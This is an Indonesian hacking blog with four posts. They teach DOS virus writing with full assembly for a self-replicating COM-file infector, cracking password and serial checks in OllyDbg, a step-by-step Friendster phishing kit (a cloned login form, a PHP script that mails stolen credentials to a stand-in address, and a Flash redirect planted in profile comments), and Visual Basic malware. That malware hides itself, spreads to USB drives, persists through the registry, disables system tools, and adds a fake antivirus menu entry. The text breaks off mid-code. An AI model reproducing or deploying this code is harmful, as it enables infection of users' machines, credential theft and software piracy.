Translate

animasi bergerak gif

Senin, 29 April 2013

PEMPROGRAMAN VIRUS KOMPUTER

4. 1. Cara Kerja Virus Komputer

Cara kerja Virus Komputer pada umumnya adalah menyebarkan dirinya dengan cara antara lain menularkan file-file executable atau file-file yang bisa dijalankan langsung dari DOS Command line . Untuk memperjelas mekanisme penyebaran di ilustrasikan pada gambar dibawah ini :

  4.2. Mekanisme Penularan

Sudah jadi sifat virus jika dia dijalankan, maka ia menulari program aplikasi yang lain, yang di maksud menulari adalah menyalin dirinya atau program virus tersebut ke program aplikasi lainnya, jika dalm hal ini yang tertular adalah program Aplikasi 1, maka apabila program aplikasi 1 tersebut dijalankan, maka program aplikasi 1 yang sudah serinfeksi virus itu akan menularkan virus pada program aplikasi yang ke 2 , maka baik program aplikasi 1 maupun 2, sudah merupakan program pemikul bagi virus itu sendiri, yang akan menularkan seluruh program aplikasi yang ada.
Agar bisa bertindak sebagai virus komputer, sebuah program harus mempunyai 5 buah kemampuan yang merupakan prinsip dari virus komputer. Kelima kemampuan itu adalah :
  1. Kemampuan mendapatkan informasi
  2. Kemampuan memeriksa program
  3. Kemampuan menggandakan diri / menularkan
  4. Kemampuan mengadakan manipulasi
  5. Kemampuan menyembunyikan diri sendiri

4. 1.1. Kemampuan mendapatkan Informasi

Pada Virus Komputer kemampuan untuk mendapatkan informasi sangat penting, terutama informasi mengenai file yang akan diinfeksi, Virus Komputer biasa nya tidak menulari 1 program saja, tapi sekumpulan program, contohnya File-file EXE, file-file COM, atau kedua-duanya, virus harus mendapatkan informasi tentang file tersebut pada directory, hal-hal mengenai informasi pada file yang perlu diketahui antara lain :
1. Apakah Extensi File tersebut ( COM,EXE, BAT)
2. Apa Atribut file ( Hidden, Readonly, Archive)
3. Besar File Yang akan Di infeksi
Informasi tersebut sangat bermanfaat bagi virus, dimana informasi mengenai Extension file berguna untuk virus yang menyerang file-file tertentu contohnya virus yang menyerang file EXE, virus tersebut harus mencari file-file EXE yang akan ditulari.
Informasi attribut berguna untuk memberikan pilihan pada virus apakah dapat menyerang file dengan attribut Readonly, Hidden ataukan virus harus mengeset attribut file-file tersebut menjadi Normal, sehingga virus dapat menulari.
Informasi tentang ukuran file berguna untuk operasi matematis yang akan menghitung berapa besar file yang sudah tertular, dimana

Besar_file_terinfeksi = file_asli + Virus_size

Fungsi ini terutama dipakai oleh virus Non OverWriting. Dibawah ini cuplikan metode virus untuk mendapatkan informasi tentang File :

Start : mov dx,offset File_to_infect ; cari seluruh file Mov ah,4Eh
Mov cx, 3 ; Attribut File    ; cari host file

———
int 21h     ; Dos Intrupt
cmp ax,12h  ; Ada file lagi
je exit     ; kalau tidak ada exit
———
file_to_infect db “*.COM” ; File yang akan diinfeksi
ends start                ; akhir kode Virus


Listing 4.1. Search First File

Dimana Dx menuju ke alamat yang berisi nama file yang akan di infeksi, sedangkan disini di gunakan DOS Interupt 21H dengan Service ah, 4EH yang berguna untuk mencari file pertama yang cocok dengan DX ( Find First Matching File), dan mendapat kan informasi tentang file yang berada di dalam directory, biasanya fungsi 4Eh ini selalu berpasangan dengan 4Fh, yaitu fungsi untuk mencari file berikutnya yang cocok ( Find Next Maching File), sedangkan nilai CX,3 digunakan untuk mengecek attribut dari file, apakah Hidden, ReadOnly, virus dapt mengeset kembali attribut file menjadi normal, sehingga virus dapat menginfeksi file tersebut.

4. 1. 2. Kemampuan Untuk Memeriksa Program

Kemampuan untuk memeriksa program sangat penting bagi Virus Komputer , karena untuk mengetahui apakah file target sudah tertular atau belum, ini sangat penting karena virus tidak akan menularkan dirinya berkali-kali pada file yang sama, selain untuk mempercepat proses penularan juga untuk menjaga agar file korban tidak rusak, karena apabila penularan dilakukan berulang-ulang pada file yang sama, CRC dari file tersebut akan kacau dan menyebabkan file yang tertular tidak jalan, biasaanya file rusak tersebut akan mengeluarkan pesan Divide Over Flow, atau Error in Exe File, selain itu file yang berkali-kali diifeksi akan bertambah besar, dan akan mencurigakan pemakai komputer. Seperti digambarkan dalam flowchart berikut ini :

Gambar 4.2. Memeriksa Program

Berikut ini contoh listing dari kemampuan untuk memeriksa file

Mov ah, 3fh       ; Baca file
Mov cx, 3         ; baca 3 byte
Mov dx,3_byte     ; simpan pada buffer
Add dx,si         ; Nama file
Int 21h           ; Dos intrupt
Cmp a,3           ; Cek 3 byte tadi
Jnz cari_lagi     ; Jika sudah tertular exit
Jmp Infect        ; kalau belum , infect_file
3_byte equ $      ;data 3 byte pertama dari file asli
;yang belum tertular
infect_file :     ; bagian penginfeksian

———— ; rutin infeksi

int 20h ; Dos Exit function
nop ; No Operation

Listing 4.2 . Periksa File

Pada rutin diatas dapat dilihat bagai mana Virus Komputer memeriksa file korbannya, untuk memberikan identitas file mana yang sudah terinfeksi maupun yang belum, karena dengan memeriksa file korban, umumnya 3 byte pertama yang menandakan file tersebut sudah tertular / belum, 3 byte pertama tersebut umumnya intruksi JMP : offset (Untuk file COM) , kode ‘MZ’ pada header file EXE dan PE untuk File Aplikasi Windows
Rutin ini sangat penting untuk menghindari penularan berkali-kali pada file korban, juga untuk menpercepat penularan. Rutin ini dipakai oleh 90 % virus komputer untuk menularkan diri.
4. 1. 3. Kemampuan untuk menggandakan diri / Replicating
kemampuan ini merupakan inti utama dari Virus Komputer , karena virus komputer memang diprogram untuk menularkan, dan memperbanyak dirinya. Tugas dari rutin replicating ini adalah menyebarkan virus keseluruh system yang ditularinya, tugas dari rutin ini sangat berat karena rutin tersebut harus mampu menyebarkan virus dengan cepat dan tidak diketahui oleh pemakai komputer, selain itu rutin replicator harus dapat menjaga agar file yang ditularinnya tidak rusak ( Rutin untuk Virus Appending / NonOverwriting ), dan dapat berjalan sebagaimana mestinnya.
Cara kerja rutin replicator pada file COM lebih sederhana dari file EXE, karena struktur program EXE yang tidak terbatas besarnya yaitu ( sebesar memory di komputer ), sedangkan file COM hanya dibatasi sampai 64 Kb ( Base memory ). Rutin replikator pada file COM akan menditeksi dan mengcopy byte pertama dari file yang akan ditularinya, kedalam suatu daerah di memory, rutin tersebut dipindahkan kedalam daerah lain dalam file.
File bersih                                 program Virus
Pada diagram diatas P1 adalah bagian pertama dari file, P2 adalah bagian kedua dari file korban. P1 harus sama besar dengan V1 (rutin virus) , rutin virus akan menyimpan P1 dan mengcopynya pada bagian akhir dari file.
Setelah itu virus akan mengcopykan bagian pertama dari dirinya (V1) ke bagian awal file korban. Dimana V1 berisi instruksi JMP:V2, yaitu instruksi untuk memanggil badan Virus yang ada di belakang file korban.
Kemudian virus akan mengcopykan bagian kedunya (V2) yang merupakan badan virus ke akhir file yang ditulari, V2 ini biasanya berisi rutin-rutin lain seperti rutin untuk pengaman, rutin untuk melakukan aksi tertentu dan lain-lain. Rutin tersebut dapat dilihat dibawah ini :
Dalam program dapat diambil contoh 44-Virus.Com , yang merupakan virus sepanjang 44 byte, dengan cara kerja Overwriting file Com yang ada dalam suatu directory sepanjang badan Virus itu sendiri yaitu 44 Byte, virus ini masih sangat sederhana dan belum mempunyai rutin-rutin pengaman, maupun kemampuan untuk memeriksa program, ataupun rutin untuk aksi-aksi tertentu , dalam contoh dibawah ini virus hanya mempunyai kemampuan untuk menulari file Com.
Namun demikian dapat kita lihat bagaimana virus akan berkembang dengan cara menggandakan dirinya dalam program Com.
Berikut ini listing dari 44-Virus.Asm :

virus segment
org 100h ; file COM
assume cs:virus
len equ offset last-100h ;Panjang virus = Akhir program – awal program
start : mov ah,04eh      ; Cari file dengan kategori file COM
xor cx,cx                ; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask          ; Nama file COM masukan ke register DX
int 21h                  ; Dos Intrupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
Infect : mov cx,len     ; cx diisi panjang badan virus
lea dx,start            ; Masukan header Virus “V1″ pada DX
Mov ah,40h              ; Tulis badan virus dalam file korban
Int 21h                 ; Dos Intrupt
Next : mov ah,3eh       ; Tutup file korban
int 21h
mov ah,4fh    ; Cari file korban lagi
int 21h
jnb open_file ; Apa sudah semua file Com ? kalau belum jmp ke Open_file
; Kalau sudah semua terinfeksi Exit
com_mask: db “*.COM”,0 ; File dengan ekstensi Com
last : db 090h         ; Akhir badan virus “V2″
virus ends
end start

Listing 4.3. Replicating / Penggandaan

4. 1. 4. Kemampuan Mengadakan Manipulasi
Kemampuan untuk mengadakan manipulasi sangat penting dilakukan oleh virus, karena bagian ini sebetulnya yang membuat virus komputer menarik, dan mempunyai seni dalam pembuatannya. Bagian manipulasi atau rutin manipulasi ini banyak macamnya, dan fungsinya, suatu virus dapat mempunyai salah satu diantara rutin-rutin manipulasi ini maupun gabungan antara rutin-rutin manipulasi tersebut. yang pasti, makin banyak rutin manipulasi yang dipakai oleh virus, maka akan makin besar ukuran virus yang dibuat. Diantara rutin-rutin manipulasi yang ada, yang sering digunakan adalah :
  1. Menampilkan tulisan / kata-kata / gambar
  2. Membunyikan port speaker
  3. Time bomb / logic Bomb

4.1.4.1. Menampilkan Tulisan / gambar

Rutin ini yang paling banyak dipakai oleh pembuat Virus Komputer , karena rutin ini selain untuk kepopularitas virus maupun pembuatnya, juga akan membuat virusnya mudah dikenal oleh para pemakai komputer, selain itu rutin ini membutuhkan suatu kreatifitas tinggi dan jiwa seni dari pembuatnya yang akan membuat virus ini akan menarik. Listing program dibawah ini akan memberikan contoh pembuatan rutin ini.



virus segment
org 100h
assume cs:virus
len equ offset last-100h ; Panjang virus = Akhir program – awal program
start : jmp mulai
msg db ‘ Modification of 44 Virus ‘,13,10
db ‘ © 2000,iwing[indovirus] ’,13,10
db ‘ – For Educational Only -$’,13,10
mulai : mov ah,09        ; Dos service 09h = Cetak String
lea dx,msg               ; dx berisi pesan yang akan dicetak
int 21h ; Dos intrupt
go : mov ah,04eh         ; Cari file dengan kategori file COM
xor cx,cx                ; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask          ; Nama file COM masukan ke register DX
int 21h                  ; Dos Intrupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
infect : mov cx,len ; cx diisi panjang badan virus
lea dx,start           ; Masukan header Virus “V1″ pada DX
mov ah,40h             ; Tulis badan virus dalam file korban
Int 21h                ; Dos Intrupt
Next : mov ah,3eh      ; Tutup file korban
int 21h
mov ah,4fh             ; Cari file korban lagi
int 21h
jnb open_file          ; Apa sudah semua file Com ?,kalau belum jmp ke Open_file
; Kalau sudah semua terinfeksi Exit
com_mask: db “*.COM”,0 ; File dengan ekstensi Com
last : int 20h         ; Akhir badan virus “V2″
virus ends
end start

Listing. 4.4. Rutin Cetak String
Pada listing program virus diatas dapat dilihat, modifikasi dari virus 44 byte
Dengan tambahan rutin untuk menampilkan string :

Modification of 44 Virus
© 2000,iwing[indovirus]
-For Educational Only –

setiap kali penularan. Disini dapat dilihat rutin yang menampilkan pesan tadi yaitu

mulai : mov ah,09 ; Dos service 09h = Cetak String
lea dx,msg ; dx berisi pesan yang akan dicetak
int 21h ; Dos intrupt
BY : HENDRA HACKER
 

Minggu, 28 April 2013

Crack for OllyDbg (debuger code)

ini adalah teknik dasar crack program dengan menggunakan Software OllyDbg (Debuger code), caranya mengganti String JE (Jump If Equal) menjadi JMP (Jump) di dalam struktur program yang di crack. Jadi semua perintah dalam blok JE atau dalam bahasa pemrograman adalah “IF” di dalam struktur kode program akan di lewati.

 
Dalam video ini contoh sebuah program yang di crack akan melewati permintaan password saat program tersebut di akses. Cara ini juga bisa di gunakan untuk crack suatu software yang di lindungi dengan menggunakan SERIAL NUMBER.
(Tutorial oleh Rudi Hidayat)
Download OllyDbg dan Contoh Program:
Download OllyDBG
Kemudian simak, pelajari dan pahami video tutorial berikut:
 
Untuk bisa melakukan cracking seperti diatas, silakan download tool berikut:
1. Crackme program:
Download OllyDBG
2. Ollydbg Program:
Download OllyDBG
Selamat mencoba dan semoga berhasil.


Rabu, 24 April 2013

Phising Hack Friendster

Dalam komputer, istilah bahasa Inggris phishing adalah suatu bentuk penipuan yang dicirikan dengan percobaan untuk mendapatkan informasi sensitif, seperti kata sandi dan kartu kredit, dengan menyamar sebagai orang atau bisnis yang terpercaya dalam sebuah komunikasi elektronik resmi, seperti e-mail atau pesan instan. Istilah ini muncul dari kata bahasa Inggris fishing (’memancing’),dalam hal ini berarti memancing informasi keuangan dan kata sandi pengguna. Oleh : http://id.wikipedia.org/wiki/Phishing.
Sedangkan menurut saya Phishing sendiri mempunya arti menyamarkan sesuatu yang asli dengan yang palsu, sehingga yang palsu benar-benar mirip dengan yang asli, dengan tujuan penipuan. Kasus Phishing pernah terjadi di Official Web site BCA Online, hingga sekarang yaitu FS.
Pembahasan ini sudah dijumpai dibanyak blog-blog namun pada umumnya hanya memberikan sedikit sekali gambaran bagaimana proses phishing itu terjadi, apabila tidak hati-hati maka account kita + passwordnya akan diketahui oleh orang lain.
Baiklah sekarang akan saya berikan gambaran mengenai Phishing di FS, dalam proses Phishing di FS ada beberapa hal yang harus diketahui(versi saya), yaitu :
1. Manajemen File URL.
2. Pemahaman Form HTML.
3. mail() command di PHP.
4. Pemahaman Redirection.
5. Kreatifitas difakename URL.
5 hal tersebut merupakan faktor wajib yang harus diketahui sebelum melakukan Phishing, mengapa karena 5 komponen dasar tersebut menentukan berhasil/tidaknya sebuah Phishing, saya jelaskan fungsional 5 komponen tersebut.
1.Manajemen File URL.
Pentingnya manajemen File Url adalah dimana proses pemalsuan sebuah form yang asli ke yg palsu/yg akan kita gunakan, haruslah benar” sama modelnya/bentuknya sehingga orang lain bila tidak sangat teliti akan terkecoh bahwa form yang ada dimonitornya adalah asli, bila menggunakan Mozilla Firefox anda bisa mencuri form Login FS dengan menggunakan perintah : File > Save Page As > Filename isi “index.htm” > dan Save as Type “Web page, complete”. Tujuan dari penyimpanan file login tersebut adalah untuk membuat Login FS vesi Fake-nya, setelah kita simpan, kemudian kita rubah form actionnya seperti penjelasan no 2. Kemudian semua file tadi kita Upload ke Free Hosting kesukaan kita, saya menggunakan http://www.ripway.com -> ( http://h1.ripway.com/friendsterid ). Alamat diatas modelnya sama persis dengan Form login FS sehingga jika kita tidak teliti sangat berbahaya, yang membedakan adalah slide foto tidak berubah jika di refresh, dan juga tanggalnya, dan perhatikan source htmlnya khususnya dibagian <form>.
2. Pemahaman Form HTML.
Form HTML merupakan komponen dasar untuk mengirim informasi calon korban yang perlu dipamahami adalah komponen <form>,<input> komponen <form> mempunyai sub komponen yaitu “method” dan “action”, dimana action sangat menentukan proses Phishing yang akan kita lakukan, dan untuk <input> penting pada komponen “name” di FS input ada 2 sub komponen penting pembawa bencana :) , yaitu “email” dan “password” dimana “email” adalah id login si calon korban, script dibawah ini adalah contoh kutipan form yang saya gunakan untuk Phishing di FS.
index.htm, form yang di edit untuk phishing

<form name="login_form" method="post" action="http://fakename.com/login.php">
Email: <input name="email" maxlength="100" size="22" alt="Email Address"
tabindex="1" style="width: 200px ! important;" value="" type="text">
Password: <input name="password" maxlength="10" size="22" alt="Password"
tabindex="2" style="width: 200px ! important;" type="password">
<td><div class="loginButton"><input value="Log In" tabindex="3" type="submit">
</form>

Yang saya rubah pada bagian “action” saja, diarahkan ke file penyetor password (login.php versi kita)yang nantinya dikirim ke e-mail kita menggunakan aplikasi PHP.
3. Function mail() di PHP.
Saya pilih opsi ini karena mudah menggunakannya, ada opsi lain misal store database, namun tambah ribed nantinya anda harus membuat database untuk memasuk kan email dan password korban, dan jika mencari free hostingan php yang support ke database agak sulit :) , lebih baik lagi jika anda mempunyai hostingan yang bayar dan support ke database plus function mail(), langsung saja, kita harus me ngetahui fungsi ini karena pada saat si target login di fake FS kita, maka disinilah password dan user name di setor ke kita, dengan menngunakan fungsi mail() di php password dan user di setor ke alamat e-mail kita, disini nama file yang digunakan adalah “login.php” file tersebut kita tempatkan di hostingan milik kita(baik yg free / bayar, pastinya harus support mail(), silahkan anda coba” terlebih dahulu, atau baca howto mail() function di php manual), script dibawah ini yang saya gunakan untuk mengirim user dan password sitarget ke e-mail saya:
login.php, store user + password ke e-mail
<?
$id=$HTTP_POST_VARS['email'];
$pass=$HTTP_POST_VARS['password'];
$isi=”id: $id | password: $pass”;
$to = ‘emailkita@fakename.com’;
$subject = ‘Friendster Trap :) ’;
$message = $isi;
$headers = ‘Rejeki FS :) ’;
mail($to, $subject, $message, $headers);
?>

Sangat sederhana :) namun mematikan, jika ada yang login di fake FS kita maka user dan password akan dikirim ke “emailkita@fakename.com” dan kemudian halaman ini akan di redirect ke http://www.friendster.com”, akan kita bahas nanti mengenai redirect.
4. Pemahaman Redirection.
Redirection merupakan proses pemindahan halaman web secara otomatis/manual menggunakan script, script pertama redirection yang harus anda tahu adalah Redirection dari FS ke Fakefs kita, jadi option ini bisa menggunakan opsi manual dan otomatis, opsi manual bisa menggunakan gambar yang menarik sehingga jika kita klik gambar tersebut akan mengarah ke Fakefs kita, dan jika sudah ter klik dan target mengisikan login dan passwordnya di Fakefs kita, berhasil sudah cara ini, jika menggunakan opsi otomatis, yang saya gunakan adalah script di Flash berupa action script GetURL(”url”,”type”,”method”);, pada aplikasi flash jika kita menggunakan GetURL maka otomatis pada saat load animasi kita yang di dalamnya sudah disusupi GetURL maka halaman FS akan di redirect ke Fakefs kita (contoh : http://www.friendster.com/kuyamudik ). Jika halaman FS disamping kita buka menggunakan IE maka otomatis akan di redirect ke halaman Fakefs, karena di ditesti FS tersebut sudah ada file flash yang meredirect dari FS ke Fakefs, perhatikan address barnya, dan opsi ini berlaku jika menggunakan IE, jika pada Mozilla Firefox tidak berlaku, kecuali menggunakan type _blank.
Action Script yang saya gunakan di Flash:
press-fs.swf, file animasi disusupi action script redirection

getURL("http://friendster-id.cjb.net","_self","get");

Redirection ke 2 berada di file login.php dimana Email login dan password di kirim ke e-mail saya, karena menggunakan koneksi IIX, redirection ini tidak akan terasa, tau-tau anda sudah ada di halaman FS anda sendiri, padahal setelah anda login untuk ke 2 kalinya anda sudah terjebak, berikut script redirection ke 2 yang saya gunakan:
login.php, file pengirim Email login FS + password ke email saya

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://www.friendster.com">
<?
$id=$HTTP_POST_VARS['email'];
$pass=$HTTP_POST_VARS['password'];
$isi=”id: $id | password: $pass”;
$to = ‘emailkita@fakename.com’;
$subject = ‘Friendster Trap :) ’;
$message = $isi;
$headers = ‘Rejeki FS :) ’;
mail($to, $subject, $message, $headers);
?>

5. Kreatifitas Fakename URL.
Bagian ini juga sangat mendukung suksesnya Phishing di FS, atau disebut dengan kreatifitas membuat domain palsu / alamat palsu untuk Fakefs kita, saya sendiri menggunakan Fakefs domain http://www.friendster-id.cjb.net dengan bantuan cjb setidaknya alamat depan fakefs tersebut sudah sama dengan FS nya, disini anda dituntun mencari yang bagus untuk Faking domainnya, sehingga orang akan tertipu jika hanya melihat pada bagian tampilan saja :) .
Rule Phishing FS, menurut gaya saya :) .

[Target]->[Buka dan Login FS]->[Lihat testi teman yang terinfeksi Redirection]
|– [Jika menggunakan Mozilla Firefox, halaman gagal di redirect]->[Gagal]->[X]
|– [jika menggunakan IE, halaman akan di redirect ke Fakefs]->[Login di Fakefs]
->[Email + Password di rekam & dikirim ke email saya]->[diredirect ke FS semula]
->[Phishing FS sukses].

Sederhana sekali bukan? :) .
Komponen-komponen yang saya pakai:
1. Freehosting di : http://www.ripway.com
(http://h1.ripway.com/friendsterid) Sebagai tempat menyimpan file FS palsu/Fakefs yang sudah saya modif di bagian formnya.
2. Freedomain : http://www.cjb.net (http://www.friendster-id.cjb.net)
Fake URL yang mirip dengan http://friendster.com, dan bila dibuka isinya adalah file yang ada di ripway.com
3. Hosting PHP :
Hostingan yang support dengan function mail() yang digunakan untuk eksekusi pengiriman email dan password si target, disini saya gunakan login.php, atau anda akan menggunakan aplikasi database, silahkan saja, atau write() terserah kreasi anda sekalian :) .

4. File Redirect :
Saya menggunakan Flash, karena option otomatis redirectnya :) , hanya kelemahannya di Firefox tidak mempan :) , file ini nantinya akan disertakan di testi target.

5. Email :
Alamat email untuk store email dan password target.
Contoh FS di comment/testinya sudah terkena Phishing :
http://www.friendster.com/kuyamudik
Contoh hasil target yang sukses terkirim di email saya:
± From Date Subject
============================================
± Nobody 10:16 am Friendster Trap :)
± Nobody 7:37 am Friendster Trap :)
± Nobody Mon, 10:37 pm Friendster Trap :)
± Nobody Mon, 10:25 pm Friendster Trap :)
Jika dibuka isinya:
=================================================
Rejeki FS :)
id: sapoedjagad@hotmail.com | password: s******t
PENCEGAHAN
Ada beberapa Opsi yang harus kita perhatikan untuk FS ini, diantaranya:
  1. Biasakan membuka FS menggunakan Mozilla Firefox :) .
  2. Matikan option auto approve, di FS kita karena jika ini tidak dilakukan maka bisa saja teman mengirim comment yang mengandung Phishing :) . Option -> Approve comments automatically: Pilih “Never”.
  3. Teliti jika ingin login lihat URL nya, jika bukan dari http://friendster.com maka jangan berani-berani login, close saja, dan buka http://friendster.com.
Hanya opsi tersebut yang dapat saya sampaikan, sering-sering cek menggunakan 2 Browser lebih bagus.
Artikel ini saya tulis karena iseng saja, ingin ngebajak FS temen hehe :D dan gunakan sebagai informasi yang positif, jika ada yg menyalahgunakan isi diartikel ini penulis tidak bertanggung jawab.

Isi jika E-Mail dibuka :D
Salam manis,
Note : ada beberapa link yang sudah miss, karena host di site gratisan :)
Hide “Phising Friendster (FS)”
BY : HENDRA HACKER

Senin, 22 April 2013

Virus For Ms World ETC

Program kita kali ini adalah membuat Virus sederhana yaitu hanya mengganggu Microsoft Office Word dan Excel.Misalkan user membuka Word maka pada kertas tempat mengetik sudah muncul pesan dari Virus demikian pula jika membuka Excel maka pesan akan diberikan virus pada cell Excel. Sederhana sekali ya..ya memang virus ini tidak merusak dokumen/file-file dan tidak mengahpus file-file apapun jadi virus yang sangat baik hati..he..he..Jika anda ingin menambahkan fiture-fiture yang kejam silahkan saja tapi disini/virus ini tidak saya tuliskan bagaimana melakukan format atau delete file ataupun fiture penyusupan lainnya (sekarang belum saatnya).Silahkan dicoba dijamin 100% tidak ada data yang dihapus, ini hanya sebuah virus permainan saja kok..berani mencoba?
Yang dibutuhkan dalam pembuatan project ini adlah : 5 buah timer dan 1 drivelistbox
Pada proyek kali ini kita dapat belajar mengenai Windows Api Sendmessage, registry, dan Otomatisasi pada Word serta Excel. Semoga bermanfaat.
Masukan semua code di bawah ini pada form
==========================================
Private Declare Function FindWindow Lib “user32″ Alias “FindWindowA” (ByVal lpClassName As String, ByVal lpWindowName As String) As Long ‘pencari Kleas dan Window Name Suatu File
Private Declare Function SendMessage Lib “user32″ Alias “SendMessageA” (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long ‘sendmessage
Private Declare Function GetDriveType& Lib “Kernel32″ Alias “GetDriveTypeA” (ByVal nDrive As String) ‘ penghandel flashdisk
Private Declare Function ExitWindowsEx Lib “user32″ (ByVal dwOptions As Long, ByVal dwReserved As Long) As Long ‘exit windows
Private Const WM_CLOSE = &H10
Private Const EWX_LOGOFF = 0
Private Const EWX_SHUTDOWN = 1
Private Const EWX_REBOOT = 2
Private Const EWX_FORCE = 4
Private Const EWX_POWEROFF = 8
Option Explicit
Dim FWnd
Dim obj As Object
Dim doc As Object
Dim WrkBook As Object
Dim WrkSheet As Object
Dim i As Integer
Dim RegRun
Dim FolderStartUp
Dim FolderMyDocuments
Dim FolderTemplates
Dim FolderNetHood
Dim FolderPrintHood
Dim FolderFavorites
Dim FolderSendTo
Dim FolderPrograms
Dim FlashDisk
Private Sub Form_Load()
On Error Resume Next
‘acak caption virus shg caption akan berubah setiap windows startup atau virus tereksekusi
Randomize
Me.Caption = Int(Rnd * 2221189331445#) ‘silahkan masukan angka sesuka anda
‘menggandakan diri
GandakefolderIstimewa
Me.Visible = False
App.TaskVisible = False ‘virus tidak terlihat di task manager
InfeksiRegistry
End Sub
Sub BuatWord()
On Error Resume Next
Set obj = CreateObject(“word.application”)
Set doc = CreateObject(“word.application”)
Set doc = obj.Documents.Add
doc.Content = “VIRUS BERHASIL MENGINFEKSIMU – SALAM KENAL”
End Sub
Sub BuatXls()
On Error Resume Next
Set obj = CreateObject(“excel.application”)
Set WrkBook = obj.workbooks.Add
Set WrkSheet = WrkBook.worksheets.Add
WrkSheet.Cells(15, 4) = “VIRUS BERHASIL MENGINFEKSIMU – SALAM KENAL”
End Sub
Sub InfeksiRegistry()
On Error Resume Next
RegRun.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell”, “Explorer.exe” & ” “”" & FolderMyDocuments & “\services.exe”"” ‘virus akan tetap berjalan pada tipe windows Safe Mode
RegRun.regwrite “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell”, FolderFavorites & “\SalamKenal.exe” ‘virus akan tetap berjalan pada tipe windows Safe Mode With Command Prompt
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”, 1, “REG_DWORD” ‘Folder Options tdk dapat diakses
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”, 1, “REG_DWORD” ‘Folder Options tdk dapat diakses
RegRun.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, “REG_DWORD” ‘Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, “REG_DWORD” ‘Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD”, 1, “REG_DWORD” ‘Disable CMD dan File .Bat
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD”, 1, “REG_DWORD” ‘Disable CMD dan File .Bat
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools”, 1, “REG_DWORD” ‘registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools”, 1, “REG_DWORD” ‘registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon”, FolderTemplates & “\smss.exe” ‘smss.exe berjalan pada saat startup
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon”, FolderSendTo & “\System.exe” ‘System.exe berjalan pada saat startup
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind”, 1, “REG_DWORD” ‘search pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind”, 1, “REG_DWORD” ‘Ssearch pd star menu hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp”, 1, “REG_DWORD” ‘help suport pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp”, 1, “REG_DWORD” ‘help suport pd star menu hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose”, 1, “REG_DWORD” ‘Tombol Turn Off pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose”, 1, “REG_DWORD” ‘Tombol Turn Off pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\Control Panel\Colors\WindowText”, “255 0 0″, “REG_SZ” ‘DEFAULT TEKS MENJADI MERAH
RegRun.regwrite “HKEY_CLASSES_ROOT\Drive\shell\Scan With Antivirus\Command\”, FolderFavorites & “\SalamKenal.exe” ‘Membuat Menu Scan With Antivirus pada klik kanan Drive-drive, tapi bukan Antivirus yang dijalankan melainkan Virus SalamKenal.exe yang terletak di Folder Favorite
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives”, 4, “REG_DWORD” ‘Drive C hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives”, 4, “REG_DWORD” ‘Drive C hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu”, 1, “REG_DWORD” ‘Menu File pada Windows Ekplorer hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu”, 1, “REG_DWORD” ‘Menu File pada Windows Ekplorer hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorun”, 1, “REG_DWORD” ‘Autorun pada CD atau USB
End Sub
Sub GandaKeFlashDisk()
On Error Resume Next
If Dir(FlashDisk & “\Winlogon.exe”) <> “Winlogon.exe” Then ‘mengecek ada atau tdknya winlogon.exe di flashdisk jika tdk ada kemudian
FileCopy FolderStartUp & “\Winlogon.exe”, FlashDisk & “\Winlogon.exe”
